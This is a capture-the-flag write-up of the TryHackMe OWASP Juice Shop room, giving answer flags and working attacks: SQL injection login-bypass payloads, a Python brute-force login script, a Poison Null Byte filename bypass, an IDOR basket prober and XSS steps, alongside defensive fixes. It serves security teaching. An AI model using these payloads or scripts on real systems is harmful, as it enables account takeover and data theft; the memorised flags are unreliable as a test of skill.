TryHackMe | OWASP Juice Shop [write-up]

In this article I go through the OWASP Juice Shop room of tryhackme.com. The room is a practical tour of the OWASP Top 10 web application vulnerabilities and a useful security baseline for anyone who develops web applications.

Task 1 Open for business!

In the first task we have to start the attached virtual machine and read the rules of the room. There are no questions to answer.

Task 2 Let’s go on adventure!

Let’s look around the web application and investigate the links and the text it shows us. This is called a walkthrough.

Question #1: What’s the Administrator’s email address?

The Apple Juice product page shows us the email address.

Answer #1: admin@juice-sh.op

Question #2: What parameter is used for searching?

When we write something in the search bar and hit Enter, the URL of the page shows the search parameter.

Answer #2: q

Question #3: What show does Jim reference in his review?

In Jim’s review we can read “Fresh out of a replicator.” But what is a replicator? A quick web search shows that the term comes from the series Star Trek, which gives us the answer.

Answer #3: Star Trek

Task 3 Inject the juice

We focus on the injection vulnerabilities here. Read the task very carefully!

Open the attached VM’s IP address in the browser and start Burp Suite.

Navigate to the Account / Login page.

In Burp turn on Intercept, then back in the browser set FoxyProxy to use the Burp Suite proxy (127.0.0.1:8080 by default).

Try to log in with some dummy credentials and look at the intercepted request body in Burp.

{"email":"abc@def.com","password":"123and4"}

Now we change the email value so that the WHERE clause of the login query is always true; 1=1 is always true.

{"email":"abc@def.com' or 1=1--","password":"123and4"}

After forwarding the request we can answer the first question. (The double dash -- comments out the rest of the SQL statement, including the password check. Because or 1=1 matches every row, the query returns all users and the application logs us in as the first one, which is the administrator.)

Question #1: Log into the administrator account!

Answer #1: 32a5e0f21372bcc1000a6088b93b458e41f0e02a

We can continue.

Question #2: Log into the Bender account!

This is similar to question #1, but the task says we have to use bender@juice-sh.op this time.

{"email":"bender@juice-sh.op","password":"123and4"}

This time we do not need an always-true condition; we just close the string and comment out the rest of the query:

{"email":"bender@juice-sh.op'--","password":"123and4"}

When we forward the request the answer will appear on the screen.

Answer #2: fb364762a3c102b2db932069c0e6b78e738d4066

We don’t use 1=1 here because we know the exact email address: the email comparison already matches Bender’s row on its own, and the double dash comments out the password check that follows it. With or 1=1 the query would match every user and we would land in the first account, the administrator, again.
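To see why both payloads work, here is an added example (not code from the room or from Juice Shop) that runs the two injections from this task against a constructed SQLite stand-in for the shop’s Users table, with a string-concatenated login query beside its parameterised fix. The table contents, the unsalted MD5 password hashing and the exact shape of the query are assumptions for the demonstration; only the admin password admin123 comes from the write-up (Task 4).

```python
import hashlib
import sqlite3


def md5(password: str) -> str:
    # The stand-in stores unsalted MD5 hashes (assumption; it only matters
    # that the password clause can never match on its own).
    return hashlib.md5(password.encode()).hexdigest()


def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the shop's Users table (sample data only)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE Users (id INTEGER PRIMARY KEY, email TEXT, password TEXT)")
    con.executemany(
        "INSERT INTO Users VALUES (?, ?, ?)",
        [
            (1, "admin@juice-sh.op", md5("admin123")),                # password from Task 4
            (2, "jim@juice-sh.op", md5("constructed-jim-pw")),        # constructed
            (3, "bender@juice-sh.op", md5("constructed-bender-pw")),  # constructed
        ],
    )
    return con


def login_vulnerable(con: sqlite3.Connection, email: str, password: str):
    """Login query built by string concatenation: the email value becomes SQL text.

    Returns (id, email) of the first matching row, like a login handler that
    takes the first user the query yields, or None when nothing matches.
    """
    sql = (
        f"SELECT id, email FROM Users WHERE email = '{email}' "
        f"AND password = '{md5(password)}'"
    )
    # 'abc@def.com' or 1=1--  -> every row matches, first row (admin) wins
    # 'bender@juice-sh.op'--  -> only Bender's row matches, password check is commented out
    return con.execute(sql).fetchone()


def login_safe(con: sqlite3.Connection, email: str, password: str):
    """Same lookup with bound parameters: the quote and the -- stay plain data."""
    sql = "SELECT id, email FROM Users WHERE email = ? AND password = ?"
    return con.execute(sql, (email, md5(password))).fetchone()


if __name__ == "__main__":
    db = make_db()
    for payload in ("abc@def.com' or 1=1--", "bender@juice-sh.op'--", "abc@def.com"):
        print(f"{payload!r:32} vulnerable -> {login_vulnerable(db, payload, '123and4')}")
        print(f"{'':32} safe       -> {login_safe(db, payload, '123and4')}")
```

The fix is not to filter quotes or dashes but to stop building SQL from request data at all: with placeholders the database receives the email as a value, so the injected quote and comment never change the statement.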

Task 4 Who broke my lock?!

In this task we investigate some authentication flaws.

Question #1: Bruteforce the Administrator account’s password!

Sure thing! Weak passwords are easy to brute force. Let’s fire up our Burp Suite again and start an attack.

Capture the login request again with the Burp Proxy.

Send the login request to the Intruder module with Ctrl + I. (Or right click and use the menu.)

Clear the § symbols with the Clear § button on the right.

Mark the password value in the login request as the payload position for a Sniper attack.

{"email":"admin@juice-sh.op","password":"§§"}

Extract and load the /usr/share/wordlists/SecLists/Passwords/Common-Credentials/best1050.txt wordlist as the payload list, then start the attack. Failed logins come back with a 401 status; look for the single request that returns 200. That reveals the password for the admin user (admin123). Now we can log in and answer the question.

Answer #1: c2110d06dc6f81c67cd8099ff0ba601241f1ac0e
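The same Sniper-style attack as a script, added here as an example that is not part of the room or of Juice Shop: it replays the intercepted JSON login with each candidate password and stops at the first 200. The target address, the /rest/user/login path, the wordlist location and the 200-versus-401 oracle are assumptions taken from this task; the constructed candidate list in the demo stands in for best1050.txt.

```python
import json
import urllib.error
import urllib.request
from typing import Callable, Iterable, Iterator, Optional, Tuple

# Assumptions: the attached VM's address and the endpoint the login form posts to.
BASE_URL = "http://10.10.10.10:3000"
LOGIN_URL = BASE_URL + "/rest/user/login"


def http_attempt(email: str, password: str, url: str = LOGIN_URL) -> int:
    """Send one JSON login exactly like the intercepted request; return the HTTP status."""
    body = json.dumps({"email": email, "password": password}).encode()
    req = urllib.request.Request(
        url, data=body, headers={"Content-Type": "application/json"}, method="POST"
    )
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        # urllib raises on 4xx/5xx; the status code is still the oracle we want.
        return err.code


def brute_force(
    email: str,
    candidates: Iterable[str],
    attempt: Callable[[str, str], int] = http_attempt,
    success_status: int = 200,
) -> Optional[Tuple[str, int]]:
    """Try each candidate for one account; return (password, attempts) on the first hit."""
    for count, password in enumerate(candidates, start=1):
        if attempt(email, password) == success_status:
            return password, count
    return None


def load_wordlist(path: str) -> Iterator[str]:
    """Yield non-empty lines of a wordlist such as best1050.txt."""
    with open(path, encoding="utf-8", errors="ignore") as handle:
        for line in handle:
            word = line.rstrip("\n")
            if word:
                yield word


if __name__ == "__main__":
    words = load_wordlist("/usr/share/wordlists/SecLists/Passwords/Common-Credentials/best1050.txt")
    print(brute_force("admin@juice-sh.op", words))
```

Set BASE_URL to the VM before running it. If a target answers every attempt with the same status, compare response lengths or a marker in the body instead; a login that rate-limits or locks the account will also show up here as a sudden change in status, which is exactly the defence this task shows is missing.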

Let’s continue with the next question!

Question #2: Reset Jim’s password!

Read the task text and follow the instructions; the answer falls out of them.

Answer #2: 094fbc9b48e525150ba97d05b942bbf114987257

Task 5 AH, don’t look!

This task is about exposing sensitive information to the public.

Question #1: Access the Confidential Document!

On the About Us page there is a link that leads to the ftp/ directory on the server. We simply open it in the browser.

We download the acquisitions.md file and navigate back to the home page. The answer will wait for us there.

Answer #1: edf9281222395a1c5fee9b89e32175f1ccf50c5b

Question #2: Log into MC SafeSearch’s account!

Follow the instructions and the answer will be easy to find.

Answer #2: 66bdcffad9e698fd534003fbb3cc7e2b7b55d7f0

Question #3: Download the Backup file!

Here we have to follow the instructions again. The file we are interested in is package.json.bak, but the server only serves .md and .pdf files from the ftp/ directory, so the download is refused at first. Let’s do the Poison Null Byte bypass: append a URL-encoded null byte, %00, encoded once more as %2500 so it survives the first round of URL decoding, and then the .md extension, giving package.json.bak%2500.md. The extension check sees a name ending in .md, while the null byte truncates the filename at package.json.bak when the file is read.

Answer #3: bfc1e6b4a16579e85e06fee4c36ff8c02fb13795
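An added example (not code from the room or from Juice Shop) that models the two halves of the Poison Null Byte bypass described above: an allow-list check that only looks at how the decoded name ends, and a file layer that stops at the first NUL byte, beside a hardened check that canonicalises the name first. The .md/.pdf allow-list is taken from the task; the one-round framework decoding and the NUL truncation in the file layer are assumptions that stand in for the real platform behaviour (older runtimes truncated at NUL for real, and the shop reproduces that on purpose).

```python
from urllib.parse import unquote

# Assumption taken from the task: the ftp/ route only serves these extensions.
ALLOWED_EXTENSIONS = (".md", ".pdf")


def framework_decode(path_segment: str) -> str:
    """One round of URL decoding, as a web framework applies to a route parameter.

    %2500 becomes the literal text %00 here; it is not a NUL byte yet.
    """
    return unquote(path_segment)


def extension_check_vulnerable(requested: str) -> bool:
    """The flawed allow-list check: looks only at how the decoded name ends."""
    return framework_decode(requested).endswith(ALLOWED_EXTENSIONS)


def file_actually_opened(requested: str) -> str:
    """Models the file layer the check hands the name to.

    It decodes the remaining %00 and, like a C-string API, stops at the
    first NUL byte, so 'package.json.bak%2500.md' opens 'package.json.bak'.
    """
    name = unquote(framework_decode(requested))
    return name.split("\x00", 1)[0]


def canonical_name(requested: str) -> str:
    """Decode until nothing changes, so the check sees the bytes the open will see."""
    name = requested
    for _ in range(5):  # bounded: a name needing more rounds is hostile anyway
        decoded = unquote(name)
        if decoded == name:
            return name
        name = decoded
    return name


def extension_check_fixed(requested: str) -> bool:
    """Hardened check: canonicalise, reject NULs and path tricks, then test the extension."""
    name = canonical_name(requested)
    if "\x00" in name or "/" in name or "\\" in name or ".." in name:
        return False
    return name.endswith(ALLOWED_EXTENSIONS)


if __name__ == "__main__":
    for requested in ("package.json.bak", "package.json.bak%2500.md", "acquisitions.md"):
        print(
            f"{requested:28} allowed(vuln)={extension_check_vulnerable(requested)!s:5} "
            f"opens={file_actually_opened(requested)!r:22} "
            f"allowed(fixed)={extension_check_fixed(requested)}"
        )
```

The root cause is that the check and the open disagree about which name they are looking at. Decoding to a fixed point and validating that final name (or better, resolving it against a directory listing and serving only exact matches) removes the gap the null byte slips through.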

Task 6 Who’s flying this thing?

Question #1: Access the administration page!

We have to follow the instructions to find the admin area.

Then we log in with the admin credentials we have already found.

When we navigate to the admin area the answer will appear.

Answer #1: 946a799363226a24822008503f5d1324536629a0

Question #2: View another user’s shopping basket!

We stay logged in with the admin account.

Let’s fire up the Burp Suite.

Open Your Basket and intercept the request.

We will see the GET request like this.

GET /rest/basket/1 HTTP/1.1

The basket is fetched purely by the id in the URL; the server never checks that the basket belongs to the logged-in user, so we simply change the number to the next one (an insecure direct object reference):

GET /rest/basket/2 HTTP/1.1

Answer #2: 41b997a36cc33fbe4f0ba018474e19ae5ce52121
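To check how far this goes beyond basket 2, here is an added example (not code from the room or from Juice Shop) that replays the captured GET /rest/basket/{id} request with our own session for a range of ids and flags every basket whose owner is not us. The VM address, the authorisation headers to copy from Burp and the data.UserId field in the basket JSON are assumptions; the responses in the test are constructed.

```python
import json
import urllib.error
import urllib.request
from typing import Callable, Dict, Iterable, Tuple

# Assumptions: the attached VM and the session headers of the intercepted request
# (copy the real values from Burp; the placeholders below will not authenticate).
BASE_URL = "http://10.10.10.10:3000"
AUTH_HEADERS = {
    "Authorization": "Bearer <token from Burp>",
    "Cookie": "token=<token from Burp>",
}


def fetch_basket(basket_id: int, base_url: str = BASE_URL,
                 headers: Dict[str, str] = AUTH_HEADERS) -> Tuple[int, str]:
    """Replay the intercepted basket request for one id; return (status, body)."""
    req = urllib.request.Request(f"{base_url}/rest/basket/{basket_id}", headers=headers)
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, resp.read().decode()
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode()


def classify(status: int, body: str, my_user_id: int) -> str:
    """Decide whether one basket response exposes another user's data.

    Assumes the basket JSON carries the owner in data.UserId.
    """
    if status != 200:
        return "denied"
    try:
        owner = json.loads(body)["data"]["UserId"]
    except (ValueError, KeyError, TypeError):
        return "unparsed"
    return "own" if owner == my_user_id else "other-user"


def probe(ids: Iterable[int], my_user_id: int,
          fetch: Callable[[int], Tuple[int, str]] = fetch_basket) -> Dict[int, str]:
    """Try each basket id with our session and report what the server let us see."""
    findings = {}
    for basket_id in ids:
        status, body = fetch(basket_id)
        findings[basket_id] = classify(status, body, my_user_id)
    return findings


if __name__ == "__main__":
    # The admin is user 1 in the room; every "other-user" hit is an IDOR finding.
    for basket_id, verdict in probe(range(1, 11), my_user_id=1).items():
        print(f"/rest/basket/{basket_id}: {verdict}")
```

A correct server would look the basket up by id and by the authenticated user together, returning 404 or 403 for any id that is not ours, so the probe should report nothing but "own" and "denied".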

Question #3: Remove all 5-star reviews!

We can do that in the admin area.

Answer #3: 50c97bcce0b895e446d61c83a21df371ac2266ef

Task 7 Where did that come from?

We will learn some XSS (Cross Site Scripting) in this task.

Question #1: Perform a DOM XSS!

If we follow the instructions, we put an <iframe> element whose src attribute runs a JavaScript alert into the search bar. The search term is written straight into the DOM without sanitisation, so the browser renders the frame and executes the script.

Answer #1: 9aaf4bbea5c30d00a1f5bbcfce4db6d4b0efe0bf

Question #2: Perform a persistent XSS!

Log in as admin again.

Navigate to the Account / Privacy & Security / Last Login IP.

Intercept the log out with Burp Suite.

Follow the instructions and add the extra header described in the task to the logout request before forwarding it.

Log in again and see the answer.

Answer #2: 149aa8ce13d7a4a8a931472308e269c94dc5f156

Question #3: Perform a reflected XSS!

The id parameter of the order tracking page is reflected into the page without sanitisation, so we can follow the instructions and perform a reflected XSS attack.

Answer #3: 23cefee1527bde039295b2616eeb29e1edc660a0

Task 8 Exploration!

We just navigate to the provided URL and look around. When we return to the home page the answer will be displayed.

Answer: 7efd3174f9dd5baa03a7882027f2824d2f72d86e
